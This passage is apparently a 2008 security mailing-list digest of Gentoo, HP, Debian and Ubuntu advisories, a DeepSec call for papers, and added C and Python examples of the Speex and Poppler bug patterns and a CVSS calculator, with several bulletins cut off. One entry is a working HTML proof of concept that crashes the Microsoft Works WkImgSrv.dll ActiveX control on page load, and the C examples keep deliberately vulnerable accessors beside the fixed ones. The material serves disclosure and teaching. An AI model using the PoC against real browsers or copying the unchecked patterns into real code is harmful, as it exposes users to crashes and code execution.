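    put_le32(out + 28, 1);        /* speex_version_id */
    put_le32(out + 32, 80);       /* header_size */
    put_le32(out + 36, 16000);    /* rate */
    put_le32(out + 40, mode);     /* mode: the attacker-controlled index */
    put_le32(out + 44, 4);        /* mode_bitstream_version */
    put_le32(out + 48, 1);        /* nb_channels */
    return HDR_MIN_LEN;
}

/* Build a header with 'mode' and run it through one of the two policies. */
int32_t demo_mode(int32_t mode, int fixed)
{
    uint8_t hdr[HDR_MIN_LEN];
    size_t n = build_header(hdr, mode);
    return fixed ? header_mode_fixed(hdr, n) : header_mode_vulnerable(hdr, n);
}
int demo_frame_size(int32_t mode)
{
    uint8_t hdr[HDR_MIN_LEN];
    size_t n = build_header(hdr, mode);
    return frame_size_for_header(hdr, n);
}
```

The point the oCERT advisory makes about dynamic linking follows directly: a player that calls the library's header parser gets `header_mode_fixed` behaviour by upgrading libspeex, whereas one that carries its own copy of the pre-fix parsing (the listed gstreamer, SDL_sound, vorbis-tools, Sweep, VLC and xine-lib code) keeps the `header_mode_vulnerable` behaviour until its own source is patched.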
[ GLSA 200804-18 ] Poppler: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory        GLSA 200804-18:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Poppler: User-assisted execution of arbitrary code
      Date: April 17, 2008
   Updated: April 17, 2008
      Bugs: #216850
        ID: 200804-18:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Poppler does not handle fonts inside PDF files safely, allowing for
execution of arbitrary code.

Background
==========

Poppler is a cross-platform PDF rendering library originally based on
Xpdf.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-text/poppler          < 0.6.3                      >= 0.6.3

Description
===========

Kees Cook from the Ubuntu Security Team reported that the
CairoFont::create() function in the file CairoFontEngine.cc does not
verify the type of an embedded font object inside a PDF file before
dereferencing a function pointer from it.

Impact
======

A remote attacker could entice a user to open a specially crafted PDF
file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or
Evince, potentially resulting in the execution of arbitrary code with
the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Poppler users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/poppler-0.6.3"

References
==========

  [ 1 ] CVE-2008-1693
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1693

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
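The type-confusion pattern the GLSA describes for CairoFont::create(), as an added example in C that is not the Poppler source: a PDF-style object is a tagged union, a font object carries a pointer to a table of function pointers, and the vulnerable accessor reads that pointer out of the union without checking the tag. If the document supplies an integer where a font object is expected, the integer's bits become the address the function pointer is loaded from. The hardened accessor checks the dynamic type first and refuses anything that is not a font. The object model, the `font_ops` table and every name here are this example's own, and the value 0x41414141 is a constructed attacker-chosen integer.

```c
#include <stddef.h>
#include <stdint.h>

/* A minimal model of the object types a PDF parser hands around. */
enum obj_type { OBJ_NULL = 0, OBJ_INT, OBJ_STRING, OBJ_FONT };

/* Per-font-format virtual table: the function pointer that gets called. */
struct font_ops {
    int (*glyph_width)(int code);
};

struct pdf_object {
    enum obj_type type;
    union {
        long                   integer;
        const char            *string;
        const struct font_ops *font;
    } u;
};

static int type1_glyph_width(int code) { return code == 'A' ? 600 : 500; }
static const struct font_ops type1_ops = { type1_glyph_width };

/* Vulnerable pattern: the object is assumed to be a font and its vtable
 * pointer is read straight out of the union with no look at o.type. With an
 * OBJ_INT in that slot the caller goes on to load and call a function pointer
 * from whatever address the integer spells out. */
const struct font_ops *font_ops_vulnerable(struct pdf_object o)
{
    return o.u.font;
}

/* Hardened pattern: verify the dynamic type before touching the union. */
const struct font_ops *font_ops_checked(struct pdf_object o)
{
    if (o.type != OBJ_FONT)
        return NULL;
    return o.u.font;
}

/* Width lookup as a renderer would use it; -1 signals a rejected object and
 * the function pointer is only called once both checks have passed. */
int glyph_width_checked(struct pdf_object o, int code)
{
    const struct font_ops *ops = font_ops_checked(o);
    if (ops == NULL || ops->glyph_width == NULL)
        return -1;
    return ops->glyph_width(code);
}

/* Constructed inputs: a genuine embedded font, and an attacker-chosen
 * integer placed where the font object should be. */
struct pdf_object real_font_object(void)
{
    struct pdf_object o = { OBJ_FONT, { .font = &type1_ops } };
    return o;
}
struct pdf_object crafted_int_object(void)
{
    struct pdf_object o = { OBJ_INT, { .integer = 0x41414141L } };
    return o;
}
```

Nothing in the block dereferences the confused pointer; the check below only confirms that the vulnerable accessor returns a pointer whose value is the attacker's integer, which is the primitive a crafted PDF would build on. The fixed accessor returns NULL for the same object and the renderer rejects it.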
[security bulletin] HPSBMA02133 SSRT061201 rev.8 - HP Oracle for OpenView (OfO) Critical Patch Update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00727143
Version: 8

HPSBMA02133 SSRT061201 rev.8 - HP Oracle for OpenView (OfO) Critical Patch Update

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2006-07-19
Last Updated: 2008-04-16

Potential Security Impact: Local or remote compromise of confidentiality, availability, integrity.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Oracle® has issued a Critical Patch Update which contains solutions for a number of potential security vulnerabilities. These vulnerabilities may be exploited locally or remotely to compromise the confidentiality, availability or integrity of Oracle for OpenView (OfO).

References: Oracle Critical Patch Update - April 2008

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Oracle for OpenView (OfO) v8.1.7, v9.1.01, v9.2, v9.2.0, v10g, v10gR2 running on HP-UX, Tru64 UNIX, Linux, Solaris, and Windows.

BACKGROUND
Oracle is a registered U.S. trademark of the Oracle Corporation, Redwood City, California.

Oracle has issued Critical Patch Update - April 2008. For more information:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html

Information about previous Oracle Critical Patch Updates can be found here:
http://www.oracle.com/technology/deploy/security/alerts.htm

The following products are affected:

ORA200BC OfO v8.1.7 for HP-UX LTU
ORA205BC OfO v8.1.7 for HP-UX 5 LTU Bundle
ORA230BC OfO v8.1.7 for HP-UX Media
ORA240BC OfO v8.1.7 for HP-UX Eval LTU Media
ORA300BC OfO v8.1.7 for Win 2000/NT LTU
ORA305BC OfO v8.1.7 for Win 2000/NT 5 LTU Bundle
ORA330BC OfO v8.1.7 for Win 2000/NT Media
ORA340BC OfO v8.1.7 for Win 2000/NT Eval LTU
ORA400BC OfO v8.1.7 for Sun Solaris LTU
ORA405BC OfO v8.1.7 for Sun Solaris 5 LTU Bundle
ORA430BC OfO v8.1.7 for Sun Solaris Media
ORA440BC OfO v8.1.7 for Sun Solaris Eval LTU
ORA600CA OfO for Linux LTU
ORA605CA OfO for Linux LTU Service Bureaus Bundle
ORA631EE Oracle EE v9.2 HP-UX - 1 CPU LTU
ORA631SE Oracle SE v9.2 HP-UX - 1 CPU LTU
ORA230CA OfO v9.2 64bit HP-UX .11 Media Kit
ORA643EE Oracle EE v9.2 Windows - 1 CPU LTU
ORA643SE Oracle SE v9.2 Windows - 1 CPU LTU
ORA330CA OfO v9.2 32bit Windows Media Kit
ORA637EE Oracle EE v9.2 Solaris 64 - 1 CPU LTU
ORA634SE Oracle SE v9.2 Solaris 32 - 1 CPU LTU
ORA637SE Oracle SE v9.2 Solaris 64 - 1 CPU LTU
ORA430CA OfO v9.2 32bit Sun Solaris 2.72.8 Media
ORA431CA OfO v9.2 64bit Sun Solaris 2.72.8 Media
ORA646EE Oracle EE v9.2 Tru64 - 1 CPU LTU
ORA646SE Oracle SE v9.2 Tru64 - 1 CPU LTU
ORA530CA OfO v9.1.01 64bit Tru64 V5.1a Media Kit
ORA640EE Oracle EE v9.2 Linux - 1 CPU LTU
ORA640SE Oracle SE v9.2 Linux - 1 CPU LTU
ORA630CA OfO v9.2.0 for Linux Media Kit
T2607AA Oracle for OpenView Partition Opt LTU
T3847EE Oracle v10g EE HP-UX, 1 CPU LTU
T3847SE Oracle v10g SE HP-UX, 1 CPU LTU
T3848AA Oracle v10g EE/SE HP-UX PA-RISC 64, Media
T3847AA Oracle v10g EE/SE HP-UX Itanium, Media
T3843EE Oracle v10g EE Windows 32, 1 CPU LTU
T3843SE Oracle v10g SE Windows 32, 1 CPU LTU
T3843AA Oracle v10g EE/SE Windows 32, Media
T3844EE Oracle v10g EE Solaris 64, 1 CPU LTU
T3844SE Oracle v10g SE Solaris 64, 1 CPU LTU
T3844AA Oracle v10g EE/SE Solaris 64, Media
T3849EE Oracle v10g EE Tru64, 1 CPU LTU
T3849SE Oracle v10g SE Tru64, 1 CPU LTU
T3849AA Oracle v10g EE/SE Tru64, Media
T3845EE Oracle v10g EE Linux, 1 CPU LTU
T3845SE Oracle v10g SE Linux, 1 CPU LTU
T3846AA Oracle v10g EE/SE Linux x86-32, Media
T3845AA Oracle v10g EE/SE Linux x86-64, Media
T4855EE Oracle v10gR2 EE HP-UX, 1 CPU LTU
T4855AA Oracle v10gR2 EE/SE HP-UX PA-RISC 64, Media
T4856AA Oracle v10gR2 EE/SE HP-UX Itanium, Media
T4857EE Oracle v10gR2 EE Windows 32, 1 CPU LTU
T4857SE Oracle v10gR2 SE Windows 32, 1 CPU LTU
T4857AA Oracle v10gR2 EE/SE Windows 32, Media
T4858EE Oracle v10gR2 EE Solaris 64, 1 CPU LTU
T4858SE Oracle v10gR2 SE Solaris 64, 1 CPU LTU
T4858AA Oracle v10gR2 EE/SE Solaris 64, Media
T4860EE Oracle v10gR2 EE Linux, 1 CPU LTU
T4860SE Oracle v10gR2 SE Linux, 1 CPU LTU
T4860AA Oracle v10gR2 EE/SE Linux x86-32, Media
ORA200CA OfO v9.2 64bit HP-UX .11 LTU
ORA205CA OfO v9.2 64bit HP-UX .11 5 LTUs
ORA230CA OfO v9.2 64bit HP-UX .11 Media Kit
ORA300CA OfO v9.2 32bit Windows LTU
ORA305CA OfO v9.2 32bit Windows 5 LTUs
ORA330CA OfO v9.2 32bit Windows Media Kit
ORA400CA OfO v9.2 32bit Sun Solaris 2.72.8 LTU
ORA401CA OfO v9.2 64bit Sun Solaris 2.72.8 LTU
ORA405CA OfO v9.2 32bit Sun Solaris 2.72.8 5 LTU
ORA406CA OfO v9.2 64bit Sun Solaris 2.72.8 5 LTU
ORA430CA OfO v9.2 32bit Sun Solaris 2.72.8 Media
ORA431CA OfO v9.2 64bit Sun
[security bulletin] HPSBST02329 SSRT080048 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-018 to MS08-025
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01433452
Version: 1

HPSBST02329 SSRT080048 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-018 to MS08-025

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-04-15
Last Updated: 2008-04-15

Potential Security Impact: Please check the table below

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA; please check the table in the Resolution section of this Security Bulletin.

References: MS08-018, MS08-019, MS08-020, MS08-021, MS08-022, MS08-023, MS08-024, MS08-025.

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Storage Management Appliance v2.1 Software running on:
Storage Management Appliance I
Storage Management Appliance II
Storage Management Appliance III

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
-- Not Applicable --
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins.

For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site:
http://www.itrc.hp.com/service/cki/secBullArchive.do

For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146
For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147
For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148
For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140

The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site:
http://www.microsoft.com/technet/security/bulletin/summary.mspx

NOTE: The SMA must have all pertinent SMA Service Packs applied

Windows 2000 Update Rollup 1
Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website:
http://h2.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManual&lang=en&cc=us&docIndexId=179111&taskId=101&prodTypeId=12169&prodSeriesId=315667

Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005, starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already.

RESOLUTION
HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy.

NOTE: Patch installation instructions are shown at the end of this table.

MS Patch - MS08-018 Vulnerability in Microsoft Project Could Allow Remote Code Execution (950183)
Analysis - SMA does not have this component. Patch will not run successfully.
Action   - Customers should not be concerned with this issue

MS Patch - MS08-019 Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (949032)
Analysis - SMA does not have this component. Patch will not run successfully.
Action   - Customers should not be concerned with this issue

MS Patch - MS08-020 Vulnerability in DNS Client Could Allow Spoofing (945553)
Analysis - Possible security issue exists. Patch will run successfully.
Action   - For SMA v2.1, customers should download patch from Microsoft and install.

MS Patch - MS08-021 Vulnerabilities in GDI Could Allow Remote Code Execution (948590)
Analysis - Possible security issue exists. Patch will run successfully.
Action   - For SMA v2.1, customers should download patch from Microsoft and install.

MS Patch - MS08-022 Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
[security bulletin] HPSBMA02328 SSRT071293 rev.2 - HP OpenView Network Node Manager (OV NNM) Running Apache, Remote Cross Site Scripting (XSS), Denial of Service (DoS), Execute Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01428449 Version: 2 HPSBMA02328 SSRT071293 rev.2 - HP OpenView Network Node Manager (OV NNM) Running Apache, Remote Cross Site Scripting (XSS), Denial of Service (DoS), Execute Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-04-15 Last Updated: 2008-04-17 Potential Security Impact: Remote cross site scripting (XSS), Denial of Service (DoS), execute arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM) running Apache. These vulnerabilities could be exploited remotely resulting in cross site scripting (XSS), Denial of Service (DoS), or execution of arbitrary code. References: CVE-2005-3352, CVE-2005-3357, CVE-2006-3747 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) v6.41, v7.01, v7.51 running Apache on HP-UX, Solaris, and Linux BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2005-3352 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2005-3357 (AV:N/AC:H/Au:N/C:N/I:N/A:C) 5.4 CVE-2006-3747 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has made the following software patches available to resolve the vulnerabilities. 
These patches are available on: http://itrc.hp.com

OV NNM v7.51
  HP-UX (IA) -- PHSS_36386 or subsequent
  HP-UX (PA) -- PHSS_36385 or subsequent
  Solaris -- PSOV_03479 or subsequent
  Linux RedHatAS2.1 -- LXOV_00052 or subsequent

OV NNM v7.01
  HP-UX (PA) -- PHSS_36773 or subsequent
  Solaris -- PSOV_03480 or subsequent

OV NNM v6.41
  HP-UX (PA) -- PHSS_37141 or subsequent
  Solaris -- PSOV_03489 or subsequent

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51
HP-UX B.11.31
HP-UX B.11.23 (IA)
=
OVNNMgr.OVNNM-RUN
action: install PHSS_36386 or subsequent
URL: http://itrc.hp.com

HP-UX B.11.23 (PA)
HP-UX B.11.11
HP-UX B.11.00
=
OVNNMgr.OVNNM-RUN
action: install PHSS_36385 or subsequent
URL: http://itrc.hp.com

For HP-UX OV NNM 7.01
HP-UX B.11.00
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN
action: install PHSS_36773 or subsequent
URL: http://itrc.hp.com

For HP-UX OV NNM 6.41
HP-UX B.11.00
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN
action: install PHSS_37141 or subsequent
URL: http://itrc.hp.com

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version: 1 (rev.1) - 15 April 2008 Initial release
Version: 2 (rev.2) - 17 April 2008 Remove Windows patches

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
To: [EMAIL PROTECTED]
Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates
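The CVSS 2.0 Base Metrics table in the HP bulletin above pairs each CVE with a base vector and a score. The calculator below is an added example, not HP's code: it applies the public CVSS v2 base-score formula (weights and rounding rule as in the v2 specification) to recompute a score from a vector, and checks the bulletin's three rows against it.

```python
"""CVSS 2.0 base-score calculator (added example; formula and weights from the
public CVSS v2 specification, table rows copied from the HP bulletin)."""
import math
import re

# Metric weights defined by the CVSS v2 specification.
ACCESS_VECTOR = {"L": 0.395, "A": 0.646, "N": 1.0}
ACCESS_COMPLEXITY = {"H": 0.35, "M": 0.61, "L": 0.71}
AUTHENTICATION = {"M": 0.45, "S": 0.56, "N": 0.704}
IMPACT = {"N": 0.0, "P": 0.275, "C": 0.660}  # shared by C, I and A

# Accepts the bulletin's "(AV:N/AC:M/Au:N/C:N/I:P/A:N)" form; parentheses optional.
VECTOR_RE = re.compile(
    r"^\(?AV:([LAN])/AC:([HML])/Au:([MSN])/C:([NPC])/I:([NPC])/A:([NPC])\)?$"
)


def parse_vector(vector):
    """Split a CVSS v2 base vector into its six metric values."""
    match = VECTOR_RE.match(vector.strip())
    if match is None:
        raise ValueError("malformed CVSS v2 base vector: %r" % (vector,))
    av, ac, au, conf, integ, avail = match.groups()
    return {"AV": av, "AC": ac, "Au": au, "C": conf, "I": integ, "A": avail}


def round_to_1_decimal(value):
    """CVSS v2 rounds half up; Python's round() uses banker's rounding."""
    return math.floor(value * 10 + 0.5) / 10.0


def impact_subscore(metrics):
    # Impact = 10.41 * (1 - (1 - C) * (1 - I) * (1 - A))
    c, i, a = (IMPACT[metrics[k]] for k in ("C", "I", "A"))
    return 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))


def exploitability_subscore(metrics):
    # Exploitability = 20 * AV * AC * Au
    return (20 * ACCESS_VECTOR[metrics["AV"]]
            * ACCESS_COMPLEXITY[metrics["AC"]]
            * AUTHENTICATION[metrics["Au"]])


def base_score(vector):
    """Base = round1(((0.6 * Impact) + (0.4 * Exploitability) - 1.5) * f(Impact)),
    where f(Impact) is 0 when the impact subscore is 0 and 1.176 otherwise.
    The f() term keeps a vector with no C/I/A impact at 0.0 instead of negative."""
    metrics = parse_vector(vector)
    impact = impact_subscore(metrics)
    exploitability = exploitability_subscore(metrics)
    f_impact = 0.0 if impact == 0 else 1.176
    raw = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact
    return round_to_1_decimal(raw)


# Rows copied from the bulletin's "CVSS 2.0 Base Metrics" table.
HP_BULLETIN_TABLE = {
    "CVE-2005-3352": ("(AV:N/AC:M/Au:N/C:N/I:P/A:N)", 4.3),
    "CVE-2005-3357": ("(AV:N/AC:H/Au:N/C:N/I:N/A:C)", 5.4),
    "CVE-2006-3747": ("(AV:N/AC:L/Au:N/C:P/I:P/A:P)", 7.5),
}


def check_table(table):
    """Return (cve, published, computed) for rows whose score does not recompute."""
    mismatches = []
    for cve, (vector, published) in sorted(table.items()):
        computed = base_score(vector)
        if computed != published:
            mismatches.append((cve, published, computed))
    return mismatches


if __name__ == "__main__":
    for cve, (vector, published) in sorted(HP_BULLETIN_TABLE.items()):
        print("%s %s published=%.1f computed=%.1f"
              % (cve, vector, published, base_score(vector)))
    print("mismatches:", check_table(HP_BULLETIN_TABLE))
```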
Microsoft Works 7 WkImgSrv.dll crash POC
DLL VERSION 7.03.0616.0
TEST ON IE7+XPSP2_CN
MYBLOG: http://hi.baidu.com/nansec/
0DAY? I don't know.

POC:

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() {
  var num = -1;
  obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"></object>
</body>
</html>
Announcement - DeepSec Conference 2008, Nov 11-14 2008
== Announcement and 1st Call for Papers ==

We are happy to invite you to the second DeepSec In-Depth Security Conference from November 11th to 14th at the Imperial Riding School Renaissance Hotel in Vienna. Pre-registration for conference guests and the call for papers website will be open from April 16th 2008 on https://deepsec.net/.

The In-Depth security conference will include two days of security talks during the conference and two days of trainings, covering the latest topics in network and IT security. There will also be a comprehensive social program around the event.

We're inviting you to submit proposals for trainings and conference talks. All proposals received before July 15th 2008, 23:59 CET will be considered by the program committee.

== Topics ==

We are interested in bleeding edge security research directly from leading researchers, professionals, academics, industry, government and the underground security community. Please do not submit specific single exploits (which might be fixed by the time of the conference) and yet-another-PHP-hack or the like. Exploit frameworks, general approaches, defective by design resp. defective by implementation and high impact exploits have a much higher chance ;)

Topics of special interest include:

* OS Security (XP, Vista, GNU/Linux, OS X, ...)
* E/I-Voting Case-Studies, Attacks, Weaknesses
* Mobile and PAN Security
* Network Protocol Analysis
* AJAX/Web2.0/Javascript Security
* Secure Software Development
* VoIP
* Perimeter Defense / Firewall Technology
* Digital Forensics
* WLAN/WiFi, GPRS and 3G Security
* IPv6
* Smart Card Security
* Cryptography
* Intrusion Detection
* Incident Response
* Rootkit Detection, Techniques, and Defense
* Security Properties of Web-Frameworks
* Malicious Code Analysis
* Secure Framework Design
* .NET and Java Security
* Security Management

Please note that we are a non-product, non-vendor biased security conference and do not welcome vendor pitches in the conference talks or trainings. We will provide an opportunity for vendor self presentation through sponsorship and vendor booths in the conference lounge, where coffee and snacks will be served during the breaks.

== Submission ==

Proposals for talks and trainings at the second annual DeepSec In-Depth Security Conference will be accepted until July 15th 2008, 23:59 CEST. All proposals should be submitted through our web site https://deepsec.net/cfp/ or by email to: [EMAIL PROTECTED]

== About DeepSec ==

DeepSec IDSC is an annual European two-day in-depth conference on computer, network, and application security. The DeepSec Conference will be held from November 11th to 14th 2008 in Vienna, and aims to bring together the world's leading security professionals from academics, government, industry, and the underground hacking community. In addition to the conference with 32 sessions we will offer between 4 and 6 two-day intense security training courses before the main conference. The conference program will be augmented with a live hacking competition and a team capture the flag contest. DeepSec is a non-product, non-vendor-biased conference. Our aim is to present the best research and experience from the fields' leading experts.

Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall Administrators, Teachers, Academic Researchers and Software Developers.

The last conference has been attended by: Ericsson, Commerzbank, Philips, RBT, GRZ IT, IERN Sierra Leone, SAP, Improware, Telekom Austria, Microsoft, BAWAG, T-Systems, Iphos, Sektion Eins, T-Mobile, Red Hat, SWITCH, Austrian National Bank, Daimler, Sentrigo, University of Vienna, SEC Consult, Tech Data, S21Sec, DHL, Bearing Point, Cygnos, wecon, YCO, and many others.

== Speakers/Trainers ==

Speaker privileges include:
* One economy class return-ticket to Vienna.
* 3 nights of accommodation in the Conference Hotel.
* Breakfast, lunch, and two coffee breaks
* Speaker activities during, before, and after the conference.
* Speaker After-Party in the Metalab Hackerspace on November 14th.

Instructor privileges include:
* 50% of the net profit of the class.
* 2 nights of accommodation in the conference hotel during the trainings.
* Breakfast, lunch, and two coffee breaks.
* Free speaker ticket for the conference.
* Speaker activities during, before, and after the conference.
* Speaker After-Party in the Metalab Hackerspace on November 14th

If you have questions, want to send us additional material, or have problems with the web form, feel free to contact us at: [EMAIL PROTECTED]

Best regards,
DeepSec In-Depth Security Conference organisation team:
Michael Kafka, DeepSec GmbH
René Pfeiffer, DeepSec GmbH
Initiated by Paul Böhm, DeepSec GmbH
[SECURITY] [DSA 1548-1] New xpdf packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Debian Security Advisory DSA-1548-1   [EMAIL PROTECTED]
http://www.debian.org/security/   Devin Carraway
April 17, 2008   http://www.debian.org/security/faq

Package: xpdf
Vulnerability : multiple
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2008-1693

Kees Cook discovered a vulnerability in xpdf, a set of tools for display and conversion of Portable Document Format (PDF) files. The Common Vulnerabilities and Exposures project identifies the following problem:

CVE-2008-1693
Xpdf's handling of embedded fonts lacks sufficient validation and type checking. If a maliciously-crafted PDF file is opened, the vulnerability may allow the execution of arbitrary code with the privileges of the user running xpdf.

For the stable distribution (etch), these problems have been fixed in version 3.01-9.1+etch3.

For the unstable distribution (sid), these problems were fixed in version 3.02-1.2.

We recommend that you upgrade your xpdf package.

Upgrade instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, powerpc, s390.
[USN-603-1] poppler vulnerability
===
Ubuntu Security Notice USN-603-1   April 17, 2008
poppler vulnerability
CVE-2008-1693
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libpoppler1  0.5.1-0ubuntu7.4
Ubuntu 6.10:
  libpoppler1  0.5.4-0ubuntu4.4
Ubuntu 7.04:
  libpoppler1  0.5.4-0ubuntu8.3
Ubuntu 7.10:
  libpoppler2  0.6-0ubuntu2.2

After a standard system upgrade you need to restart your session to effect the necessary changes.

Details follow:

It was discovered that the poppler PDF library did not correctly handle certain malformed embedded fonts. If a user or an automated system were tricked into opening a malicious PDF, a remote attacker could execute arbitrary code with user privileges.

Updated packages for Ubuntu 6.06 LTS:
[USN-603-2] KOffice vulnerability
===
Ubuntu Security Notice USN-603-2   April 17, 2008
koffice vulnerability
CVE-2008-1693
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  kword  1:1.5.0-0ubuntu9.4
Ubuntu 6.10:
  kword  1:1.5.2-0ubuntu2.4
Ubuntu 7.04:
  kword  1:1.6.2-0ubuntu1.3
Ubuntu 7.10:
  kword  1:1.6.3-0ubuntu5.2

After a standard system upgrade you need to restart KWord to effect the necessary changes.

Details follow:

